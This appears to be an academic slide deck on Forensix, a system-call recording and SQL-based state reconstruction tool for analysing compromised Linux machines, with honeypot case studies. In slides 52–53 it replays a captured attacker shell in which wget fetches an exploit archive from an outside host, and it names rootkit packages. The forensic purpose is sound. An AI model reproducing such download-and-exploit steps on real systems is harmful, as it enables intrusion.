1
Intrusion Analysis by Reconstructing System State
Ashvin Goel
University of Toronto
Joint work with Kenneth Po, Kamran Farhadi, Wu-chang Feng, and the Forensix group at PSU
2
Motivation
“Nothing is certain but death, taxes, and 0wned machines”
Exploits in software, security policies, policy enforcement
Compromised accounts
Employees gone bad
Sometimes, you need to quickly find out exactly what happened on a system
Current forensic techniques are inadequate
  Incomplete audit information
  Reconstruction process is manual and error-prone
3
The Forensix approach
Record all system activity, automate replay
“Computer TiVo”
Enable fast and accurate forensic analysis of compromised machine
What about the costs?
Forensic investigator time is expensive
Computing and storage resources are cheap and plentiful
$40 ~ 6 month replay log (small web server)
10-20% performance degradation
Cost proposition becomes more favorable every day
4
Issues
Auditing accuracy (races and proper event attribution)
  Page cache auditing to disambiguate write() races
  Permeating attribution throughout kernel
Auditing overhead
  Elimination of full read() logging
  Batching and other kernel optimizations
  Webstone benchmark => ~20% degradation
Reconstruction queries for intrusion analysis
5
Intrusion Analysis
Helps understand cause of attack
  After intrusion detection phase
Helps minimize after-effects of intrusions
  Allows accurate assessment of extent of damage
  Retrieval of uncorrupted data
  Retrieval of attack code
  Replay of system activities related to attack
  Restarting services as soon as possible
Helps determine attack signatures
  Can improve intrusion detection process
6
Analysis Requirements
Complete - analysis of all intrusions
Predictable - analysis shouldn't disturb evidence
Flexible - comprehensive views of system state
Replay bug - reconstruct specific activities
Dependency - express relations between activities
Real-time - iterative process
Performance - low overhead
7
Complete Analysis
Capture system call activity
  Host intrusions must manipulate processes, files
  Requires making system calls
Assumptions
  Kernel is not compromised
  Disable writes to kernel memory
8
Forensix architecture
9
Forensix Architecture
[Figure: architecture diagram. Labels: public network; target system; application server; operating system; authenticated system-call logging facility ("provides complete, authenticated service"); logging pinhole; private network; batched record processing; backend storage system; append-only files; database backend; forensic analysis.]
System-call data analyzed on backend system
Provides completeness and predictability
10
Flexibility?
System call data is too low level
  Deals with kernel entities (FDs, PIDs)
  Gives state change information
Humans are interested in user-visible system state
  User-level entities (files, process names)
  Need system state information at a given time/interval
Reconstruction is linear, complicated and slow
  System semantics are complicated
    Process identifier can have different names (e.g., execve)
    File descriptor can have different names (e.g., close, dup)
  Analysis tools are hard to write and slow
11
Example #1
User query
  List all processes that existed in the last hour
Query over raw audit data
  Process all fork and wait audit events to determine lifetimes of each process on the system
  Select those processes that existed in the last hour
Improvement
  Time-indexed process table
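The improvement can be sketched as follows. This is a minimal illustration, not the Forensix implementation: the event layout `(time, syscall, pid)`, the function names, and the sample events are all assumptions, and PID reuse is ignored here for brevity. Lifetimes are computed once from the fork and wait events; after that, "which processes existed in this window" is a simple interval-overlap test rather than a replay of the raw audit data.

```python
from typing import Dict, List, Optional, Tuple

Event = Tuple[int, str, int]            # (time, syscall, pid); hypothetical layout
Lifetime = Tuple[int, Optional[int]]    # (Ts, Te); Te is None while still running


def build_process_table(events: List[Event]) -> Dict[int, Lifetime]:
    """Replay fork/wait events once, in time order, into pid -> (Ts, Te)."""
    table: Dict[int, Lifetime] = {}
    for time, syscall, pid in sorted(events):
        if syscall == "fork":                      # pid is the newly created child
            table[pid] = (time, None)
        elif syscall == "wait" and pid in table:   # pid is the reaped child
            table[pid] = (table[pid][0], time)
    return table


def existed_between(table: Dict[int, Lifetime], start: int, end: int) -> List[int]:
    """Return pids whose lifetime overlaps the window [start, end]."""
    return sorted(
        pid for pid, (ts, te) in table.items()
        if ts <= end and (te is None or te >= start)
    )


# Made-up sample data: pid 100 exits at t=30, before the window opens at t=40.
events = [(10, "fork", 100), (20, "fork", 101), (30, "wait", 100), (50, "fork", 102)]
table = build_process_table(events)
last_hour = existed_between(table, start=40, end=60)
print(last_hour)
```

The table is built once and can be reused by every later query, which is the point of indexing process state by time.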
12
Example #2
Suspected ptrace-execve race that created a new setuid binary yesterday
User query
  Compare setuid root binaries of today to a few days ago
  Find files with owner=O and permission=P at time=T
13
Example #2
Query over raw audit data
  Find all files owned by O at time T
    For each file created (mkdir, mknod, create, symlink), find last event (chown) before T that set owner to O
    Remove files that were deleted before T (rmdir, unlink)
  Find all files with permission P at time T
    For each file created (mkdir, mknod, create, symlink), find last event (chmod) before T that set permission to P
    Remove files that were deleted before T (rmdir, unlink)
  Return intersection of above two queries
Problem
  All events must be examined (only last one matters)
14
Example #3
Suspected rootkit (rkid.tar.gz) and local root exploit (xpl.tar.gz) packages installed on machine at some point in time
Unpack into directories named rkid and xpl
User query
  Find the contents of directory=D at time=T
Query over raw audit data
  Find each file created (mkdir, mknod, create, symlink, link), updated (rename), or removed (rmdir, unlink) from directory=D before time=T
Problem (same as Example #2, replay all events)
15
Other examples
Tracking modifications to /etc/passwd
  Find the path name of a file whose inode=I at time=T
  Return all modifications done on inode=I
Privilege escalations
  Find processes whose effective user id=E between Ts and Te
16
Reconstructing System State
17
System State Mappings
Map kernel entities to user-visible system state
  Track changes to this mapping over time
  Table of “object and attribute lifetimes”
Allows analysis tools to reuse reconstructed state
  Mappings constructed upon audit insertion to backend database
  Lifetimes stored in “interval tables”
18
Interval Tables
Mapping table       | Table columns                                      | System calls
inode table         | inode+, file_name, parent_inode+, Ts, Te           | create*, mkdir, link, symlink, mknod, rename, unlink, rmdir
connection table    | inode+, connection_tuple+, Ts, Te                  | socketcall* (accept, connect, etc.)
file_owner table    | inode+, owner, group, permission, Ts, Te           | create*, mkdir, symlink, mknod, chown*, chmod*, unlink, rmdir
process table       | pid+, inode+, file_name, parent_inode+, Ts, Te     | fork*, execve*, wait*
process_owner table | pid+, uid, euid, gid, egid, Ts, Te                 | fork*, execve*, wait*, setuid*
19
Interval tables
Each table has ID, begin and end time
Complexity of system semantics interpreted when mappings are constructed
Analysis queries written in SQL
  Without iteration or recursion
  Easier optimization of queries
20
Constructing Mappings
Mappings are constructed for a time interval
Need at least two queries
  New rows created with begin time
  Update current rows with end time
Construction is idempotent
  Allows overlapping construction, deletion, recreation
Reconstruction must be in time order
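The two-query construction can be tried out with a small in-memory SQLite database. This is a sketch under stated assumptions, not the Forensix schema: the simplified `event` and `inode_mapping` tables, the `build_inode_mapping` helper, and the sample rows are hypothetical. SQLite has no multi-table UPDATE, so the end-time query uses a correlated subquery instead.

```python
import sqlite3


def build_inode_mapping(db: sqlite3.Connection, start: int, finish: int) -> None:
    """Construct name lifetimes from audit events with time in [start, finish]."""
    # Query 1: create new rows and fill in the begin time.
    # The UNIQUE constraint plus INSERT OR IGNORE makes a repeated run a no-op.
    db.execute(
        """INSERT OR IGNORE INTO inode_mapping (inode, path, begintime)
           SELECT inode, path, time FROM event
           WHERE syscall IN ('mkdir', 'mknod', 'symlink')
             AND time BETWEEN ? AND ?""",
        (start, finish),
    )
    # Query 2: fill in the end time of rows that are still open.
    # Rows with no matching removal event keep endtime = NULL.
    db.execute(
        """UPDATE inode_mapping
           SET endtime = (SELECT MIN(e.time) FROM event e
                          WHERE e.syscall IN ('unlink', 'rmdir')
                            AND e.inode = inode_mapping.inode
                            AND e.path = inode_mapping.path
                            AND e.time >= inode_mapping.begintime
                            AND e.time BETWEEN ? AND ?)
           WHERE endtime IS NULL""",
        (start, finish),
    )


db = sqlite3.connect(":memory:")
db.executescript(
    """
    CREATE TABLE event (time INTEGER, syscall TEXT, inode INTEGER, path TEXT);
    CREATE TABLE inode_mapping (
        inode INTEGER, path TEXT, begintime INTEGER, endtime INTEGER,
        UNIQUE (inode, path, begintime));
    """
)
db.executemany(
    "INSERT INTO event VALUES (?, ?, ?, ?)",
    [(10, "mkdir", 7, "/tmp/xpl"), (25, "rmdir", 7, "/tmp/xpl"), (30, "mkdir", 8, "/tmp/rkid")],
)

build_inode_mapping(db, 0, 100)
build_inode_mapping(db, 0, 100)   # second run over the same interval changes nothing
rows = db.execute(
    "SELECT inode, path, begintime, endtime FROM inode_mapping ORDER BY begintime"
).fetchall()
print(rows)
```

Running the construction twice over the same interval leaves the table unchanged, which is the idempotence property the slide relies on for overlapping construction and recreation.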
21
Mapping Issues
Each kernel entity should be unique
  PID, INODE have to be unique
PID
  Add generation number during backend processing
  Generation number initialized to current time
INODE
  Persistent generation number available from file system
  Generation number is incremented when inode is reused
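A minimal sketch of the PID case, assuming the generation number is simply the timestamp of the fork event that created the process. The `PidTagger` class and its method names are hypothetical and only illustrate how a (pid, generation) pair keeps two incarnations of a reused PID apart.

```python
from typing import Dict, Tuple


class PidTagger:
    """Tag each process incarnation with a unique (pid, generation) pair."""

    def __init__(self) -> None:
        self._generation: Dict[int, int] = {}   # pid -> generation of live incarnation

    def on_fork(self, pid: int, time: int) -> Tuple[int, int]:
        # Assumption: the generation is initialized to the time of the fork event.
        self._generation[pid] = time
        return (pid, time)

    def current(self, pid: int) -> Tuple[int, int]:
        # Later events that mention only the raw pid resolve to the live incarnation.
        return (pid, self._generation[pid])


tagger = PidTagger()
first = tagger.on_fork(4321, time=1000)
second = tagger.on_fork(4321, time=5000)   # the kernel reused PID 4321
print(first, second, tagger.current(4321))
```

Rows keyed on the pair rather than the bare PID never merge the histories of two unrelated processes.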
22
Example #2 revisited
Find files with owner=O and permission=P at time=T
SELECT f.inode
FROM file_owner f
WHERE f.owner = O AND f.permission = P
  AND T BETWEEN f.ts AND f.te
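To see the interval query answer the original question (which setuid root binaries are new?), it can be run at two points in time and the results compared. The sketch below uses SQLite with a made-up `file_owner` table; the rows, the `files_with` helper, and the use of NULL for a still-open interval are assumptions for illustration.

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute(
    "CREATE TABLE file_owner "
    "(inode INTEGER, owner INTEGER, permission INTEGER, ts INTEGER, te INTEGER)"
)
db.executemany(
    "INSERT INTO file_owner VALUES (?, ?, ?, ?, ?)",
    [
        (11, 0, 0o4755, 100, 900),     # setuid root for the whole period
        (12, 0, 0o0755, 100, 400),     # ordinary root-owned binary...
        (12, 0, 0o4755, 400, None),    # ...that became setuid at t=400
        (13, 500, 0o4755, 100, None),  # setuid, but not owned by root
    ],
)


def files_with(db, owner, permission, t):
    """Inodes with the given owner and permission at time t (te NULL = still open)."""
    rows = db.execute(
        "SELECT inode FROM file_owner "
        "WHERE owner = ? AND permission = ? "
        "AND ? BETWEEN ts AND COALESCE(te, ?) ORDER BY inode",
        (owner, permission, t, t),
    )
    return [row[0] for row in rows]


before = files_with(db, 0, 0o4755, 300)
after = files_with(db, 0, 0o4755, 500)
new_setuid = sorted(set(after) - set(before))
print(new_setuid)
```

Each lookup touches only the rows whose interval contains T, so no event replay is needed to compare the two snapshots.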
23
Example #3 revisited
Find the contents of directory=D at time=T
SELECT i.file_name
FROM inode i
WHERE i.parent_inode = D
  AND T BETWEEN i.ts AND i.te
24
Analysis Tools
25
Types of Tools
File-Access Tracker
  Shows files accessed or modified in a time interval
IO Tracker
  Replays IO performed by processes
  Reconstructs contents of files and directories
Dependency Tracker
  Displays dependencies between processes and files
26
File-Access Tracker
General query to display access or modification times of files
Uses two queries
  Calls that use paths (rename, unlink, etc.)
  Calls that use file descriptors
Shows all names of accessed or modified files
  Hard links, removes, renames, etc.
Filtering to limit results
  Event type (e.g., create, open), time interval, last access, file names, file attributes, process names, process attributes
Implemented via a join of interval tables and underlying Forensix tables
27
SQL code for finding files modified via file descriptors
SELECT i.inode+, max(e.time)
FROM event e, fd_mapping f, inode_mapping i
WHERE e.syscall in (read*, write*, fchown, fchmod, truncate*)
  AND f.pid+ = e.pid+
  AND f.fd = e.fd
  AND f.i_id = i.id
  AND e.time BETWEEN f.begintime AND f.endtime
  AND e.time BETWEEN starttime AND finishtime
GROUP BY i.inode+;
28
IO Tracker
Process IO tracker
  List all I/O of a process
  Useful for recreating shell session (w/ descendants)
  Use process interval table to get PID+ given a name
  Use inode interval table to get inode of terminal
File IO tracker
  List all I/O for a file
  Useful for reconstructing access to and modification of files
  Use inode interval table to get inode of file
29
Process IO Tracker
Find descendants of PID to track user sessions
INSERT INTO tmp_event (id, time)
SELECT e.id, e.time
FROM event e, fd_mapping f, tmp_pid p, inode_mapping i
WHERE e.syscall in (write*)
  AND f.pid+ = e.pid+
  AND f.pid+ = p.pid+
  AND f.fd = e.fd
  AND f.i_id = i.id
  AND e.time BETWEEN f.begintime AND f.endtime
  AND i.path = path; /* e.g., /dev/pts0 */
SELECT data
FROM io, tmp_event e
WHERE io.parent = e.id
ORDER BY e.time;
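The first step, collecting the descendants of a PID, is what would populate a table such as tmp_pid in the query above. A minimal breadth-first sketch, assuming the fork relationships are available as (parent, child) pairs; the `descendants` function and the sample pairs are hypothetical:

```python
from collections import defaultdict, deque
from typing import Iterable, List, Tuple


def descendants(fork_edges: Iterable[Tuple[int, int]], root: int) -> List[int]:
    """Return every process forked, directly or indirectly, by root (breadth-first)."""
    children = defaultdict(list)
    for parent, child in fork_edges:
        children[parent].append(child)

    found: List[int] = []
    visited = {root}
    queue = deque([root])
    while queue:
        pid = queue.popleft()
        for child in children[pid]:
            if child not in visited:
                visited.add(child)
                found.append(child)
                queue.append(child)
    return found


# Made-up process tree: 1 forks 2 and 5, 2 forks 3 and 4, and 9 -> 10 is unrelated.
fork_edges = [(1, 2), (2, 3), (2, 4), (1, 5), (9, 10)]
session = descendants(fork_edges, 2)
print(session)
```

Including the descendants matters for shell replay because commands started from the shell write to the same terminal as the shell itself.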
30
File IO Tracker
File tracker
  Similar to process IO tracker, but with inode instead of PID
  Obtains inode at recreation time
  Recreates opens, writes, seeks and truncates
  Does not currently track memory-mapped writes
31
Directory Tracker
List paths in inode interval table with prefix that matches directory
See example #3
32
Dependency Tracker
Used to determine contamination of system by malicious activity
Process to process dependencies
  Fork or execve
File to process dependencies
  Process reads from file
Process to file dependencies
  Process writes to file
File to file dependencies (bidirectional)
  Two file names refer to same file (link, chroot)
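The four dependency kinds can be expressed as directed edges derived from audit events. The sketch below is illustrative only: the `(syscall, actor, target)` event layout, the `dependency_edges` function, and the sample events are assumptions, and only a handful of system calls are handled.

```python
from typing import List, Tuple

Event = Tuple[str, str, str]   # (syscall, actor, target); hypothetical layout
Edge = Tuple[str, str]         # (source, sink): source may have influenced sink


def dependency_edges(events: List[Event]) -> List[Edge]:
    """Translate audit events into directed dependency edges."""
    edges: List[Edge] = []
    for syscall, actor, target in events:
        if syscall in ("fork", "execve"):
            edges.append((actor, target))      # process -> process
        elif syscall == "read":
            edges.append((target, actor))      # file -> process
        elif syscall == "write":
            edges.append((actor, target))      # process -> file
        elif syscall == "link":
            edges.append((actor, target))      # file <-> file (bidirectional):
            edges.append((target, actor))      # both names refer to the same file
    return edges


# Made-up events for illustration.
events = [
    ("fork", "httpd", "/bin/sh"),
    ("read", "/bin/sh", "/etc/passwd"),
    ("write", "/bin/sh", "/tmp/out"),
    ("link", "/tmp/out", "/tmp/alias"),
]
edges = dependency_edges(events)
print(edges)
```

Note that a read reverses the direction: the file is the source and the reading process is the sink.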
33
Backward and Forward Tracking
Need one or more detection points
Backward tracking
  Shows sequence of states that lead to a detection point
Forward tracking
  Shows sequence of states affected by a detection point
Needs filters for additional pruning
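Backward and forward tracking amount to reachability over the dependency graph, in opposite directions. The sketch below is a simplification under stated assumptions: the `track` function and the edge list are hypothetical, and event timestamps are ignored, whereas a real tracker would presumably follow only edges that are consistent in time.

```python
from collections import defaultdict
from typing import Iterable, Set, Tuple


def track(edges: Iterable[Tuple[str, str]], detection_point: str,
          backward: bool = False) -> Set[str]:
    """Return nodes reachable from the detection point, following edges
    forward (what it affected) or backward (what led to it)."""
    adjacency = defaultdict(set)
    for src, dst in edges:
        if backward:
            adjacency[dst].add(src)
        else:
            adjacency[src].add(dst)

    seen = {detection_point}
    stack = [detection_point]
    while stack:
        node = stack.pop()
        for neighbour in adjacency[node]:
            if neighbour not in seen:
                seen.add(neighbour)
                stack.append(neighbour)
    return seen - {detection_point}


# Hypothetical edges (source influenced sink); crond/updatedb is unrelated activity.
edges = [
    ("httpd", "/bin/sh"),
    ("/bin/sh", "/bin/bash"),
    ("/bin/bash", "/usr/bin/wget"),
    ("/bin/bash", "/usr/bin/ftp"),
    ("/usr/bin/ftp", "/var/tmp/xpl.tgz"),
    ("crond", "/usr/bin/updatedb"),
]
causes = track(edges, "/var/tmp/xpl.tgz", backward=True)
effects = track(edges, "/bin/bash")
print(sorted(causes), sorted(effects))
```

Unrelated activity never appears in either result, but forward tracking from a busy process can still grow large, which is why additional filters are needed.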
34
Evaluation
35
Setup
Honeypot system
  Redhat 7.1 (seawolf) distribution
  Vulnerabilities
    Httpd with SSL
    Wu-ftpd
    Sendmail
    Ptrace
2600+ AMD Athlon frontend
Intel Pentium 2.4 GHz backend, 512 MB, 120 GB
36
FTP intrusion #1: Files Modified Daily
[Chart: files modified per day, 05/17/04 through 05/23/04, on a 0% to 100% axis, broken down by directory: /usr, /spool, /sbin, /root, /incoming, /home, /ftp, /etc, /dev, /bin, /var, /tmp]
37
Analysis of FTP Intrusion #1
Files modified by root, grouped by directory
/bin        1     /bin/netstat          05-17 15:54:17
/etc        28    /etc/passwd           05-17 15:52:04
                  /etc/group            05-17 15:51:29
                  ...
/ftp        1773
/home       6
/incoming   3
/root       1     /root/.bash_history   05-17 16:43:25
/sbin       1     /sbin/ifconfig        05-17 15:54:18
/spool      5
/tmp        328
/var        29
/usr        3     /usr/bin/killall      05-17 15:54:22
                  /usr/bin/chfn         05-17 16:04:14
                  /usr/bin/chsh         05-17 16:06:04
38
FTP intrusion #2
39
Analysis of FTP intrusion #2
Files modified by root, grouped by directory
/bin    74    /bin/kill             05-12 17:11:58
              /bin/ps               05-12 17:11:46
/dev    3
/etc    84    /etc/passwd           05-12 17:11:20
/home   11
/lib    588
/root   3     /root/.bash_history   05-12 18:40:32
/sbin   175   /sbin/ldconfig        05-12 17:12:09
/tmp    26
/var    452
/usr    26    /usr/bin/killall      05-12 17:11:46
40
FTP intrusion #2 analysis
Query | Time taken
List all modified files and directories | 11 s
Dependency graph generation | 22 s
Finding interactive shells | < 1 s
Finding UID of shell process | < 1 s
Replaying attacker's shell | 1 s
Recreation of the removed attack files | 3 s
Finding execves issued by the children of the compromised in.ftpd process | 1 s
Finding the listening port set by the attack code | 1 s
41
Overhead (Busiest Day)
Number of events | 15.6 million
Total file size | 1.7 GB
Size of database w/o interval tables | 2.2 GB
Size of interval tables | 64 MB
Database loading time | 37.8 min
Interval table generation time | 26.4 min
42
Performance Under Heavy Load
Storage needs under heavy load
  8-10 GB per day
  Mapping tables can be purged and recreated
Experiment | Linux | Forensix
Kernel build time (seconds) | 193.8 | 195.0 (0.6%)
Webstone throughput (Mb/s) | 258.3 | 239.2 (92.6%)
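The percentages in the table follow directly from the raw measurements. The short check below recomputes them; only the four measured values come from the slide, and the variable names are illustrative.

```python
# Measurements from the table above.
linux_build_s, forensix_build_s = 193.8, 195.0   # kernel build time, seconds
linux_tput, forensix_tput = 258.3, 239.2         # Webstone throughput

# Kernel build: relative slowdown of Forensix over stock Linux.
build_slowdown_pct = (forensix_build_s - linux_build_s) / linux_build_s * 100

# Webstone: share of the stock throughput that Forensix retains, and the loss.
throughput_retained_pct = forensix_tput / linux_tput * 100
throughput_loss_pct = 100 - throughput_retained_pct

print(f"kernel build slowdown: {build_slowdown_pct:.1f}%")
print(f"Webstone throughput retained: {throughput_retained_pct:.1f}%")
print(f"Webstone throughput lost: {throughput_loss_pct:.1f}%")
```

The two parenthesized figures are therefore different kinds of numbers: 0.6% is an overhead, while 92.6% is the throughput that remains, which corresponds to a loss of roughly 7.4% in this particular run.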
43
Related Work
System call monitoring
  USTAT: uses state transitions to detect intrusions
Tripwire, Coroner's Toolkit, Sleuth Kit
  Detects file modifications
  Recovers deleted files from unallocated disk blocks
Sebek
  Captures write calls to replay attacker's keystrokes
ReVirt, Backtracker
LIDS
  Secure front-end operation
Elephant file system
  Provides file system snapshots
44
Conclusions
Empower the user when system is compromised
  Provide a complete picture of the extent of damage
  Retrieve uncorrupted data
  Provide hints to harden system
Implement tools to allow analysis of large data
Create mappings
  Between kernel entities and user-visible state
  Simplifies tools
  Allows intrusion analysis in near real-time
45
Current status
Project page
http://syn.cs.pdx.edu/projects/4N6
Source code availability
http://forensix.sourceforge.net
Sample queries
Replay Shell (demo), Process Tree, Privilege Escalation
46
Future Work
Reduce mapping time
Reduce/filter the amount of data collected
Apply tools for intrusion detection
47
Future work
Incorporating functionality from other forensic tools
Full audit trail allows Forensix to superset other tools
Selective undo
“Back to the Future”
Automate system restoration
48
Example of Mapping Construction
/* Create new row. Fill begin time */
INSERT IGNORE INTO inode_mapping (inode+, path, type, begintime)
SELECT p.inode+, p.dst_path, p.type, e.time
FROM event e, path p
WHERE e.id = p.parent
  AND e.syscall IN (mknod, mkdir, link, rename, symlink)
  AND e.returncode >= 0
  AND e.time BETWEEN mapping_starttime AND mapping_finishtime;
/* Update end time */
UPDATE inode_mapping i, event e, path p
SET i.endtime = e.time
WHERE e.id = p.parent
  AND e.syscall IN (unlink, rename, rmdir)
  AND i.inode+ = p.inode+
  AND i.path = p.src_path
  AND i.endtime IS NULL
  AND e.returncode >= 0
  AND e.time BETWEEN mapping_starttime AND mapping_finishtime;
49
Issues With Constructing Mappings
Exit and close can be implicit
  E.g., process killed by signal
  Examine status of parent's wait system call
  Allows building queries based on signal information
State of currently running processes not known
  Open file descriptors
  Files currently on system
Vfork seen after process starts executing
Inode number obtained before or after system call
  Race condition
Remotely mounted files
  Inode numbers are not unique
50
Backward Tracking the SSL Intrusion
[Figure: dependency graph. Nodes: httpd, /bin/sh, /bin/bash, /usr/bin/wget, /usr/bin/ftp, XXX.XXX.XXX.XXX]
51
Forward Tracking the SSL Intrusion
[Figure: dependency graph annotated with four stages: login; editing source file; man page (chfn); compiling second attack. Nodes include sshd, /bin/bash, /bin/sh, /usr/X11R6/bin/xauth, /usr/bin/man, /bin/gzip, /var/cache/man/cat1/chfn.1.gz, /usr/bin/scp, /usr/bin/make, /usr/bin/cc, /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0, /usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1, /usr/bin/as, /usr/lib/gcc-lib/i386-redhat-linux/2.96/collect2, /usr/bin/ld, /bin/vi, /javabot/.awu3.c.swp, /javabot/awu3.c, /javabot/awu3, /tmp/ssh-XXyOBEne/cookies-n, compiler temporary files under /tmp, and XXX.XXX.XXX.XXX]
52
Analysis of SSL Intrusion
connected using addr 0xbffff7dc - overflow?
bash-2.04$ cd /var/tmp
bash-2.04$ wget http://pub.inter.net/xpl.tgz
--12:32:42-- http://pub.inter.net/xpl.tgz
 => `xpl.tgz'
Connecting to pub.inter.net:80...
public.inter.net: Host not found.
bash-2.04$ ftp -v XXX.XXX.XXX.XXX
53
IO Tracking the SSL Intrusion
connected using addr 0xbffff7dc - overflow?
bash-2.04$ cd /var/tmp
bash-2.04$ wget http://pub.inter.net/xpl.tgz
--12:32:42-- http://pub.inter.net/xpl.tgz
 => `xpl.tgz'
Connecting to pub.inter.net:80...
public.inter.net: Host not found.
bash-2.04$ ftp -v XXX.XXX.XXX.XXX
54
Ftpd Attack Analysis
Query | Time taken
List all the files or directories modified by euid = 0 | 44 s
Recreation of /ftp/incoming/lrk5.src.tar.gz | 2 s
Recreation of /etc/passwd file | < 1 s
Recreation of all filenames in /home/javabot directory | < 1 s
Recreation of /home/javabot/.bash_history file | < 1 s
Dependency generation, one hour | 22 s
Pruning of dependencies, one hour | 4 s
Filtering of dependencies, one hour | 1 s
55
SSL Attack Analysis
Query | Time taken
Query for bash processes in pid_mapping table | < 1 s
Run IO tracker for 8 bash processes | ~= 1-15 s
Find files modified by user apache | 7 s
Recreate modified apache log files | 8 s
Dependency generation, 30 min | 51 s
Pruning of dependencies, 30 min | 3 s
Filtering of dependencies, 30 min | 1 s
Dependency generation, 1 day | 202 s
Pruning of dependencies, 1 day | 14 s
Filtering of dependencies, 1 day | 2 s
56
Bug Fixes
Direct delivery from kernel to backend
  Tricky implementation
  1-2 copies
Removing forensix module works now
  Race between processes using the module and module being removed
Removed auto increment in event table
Comma fixes for loading
Vfork fix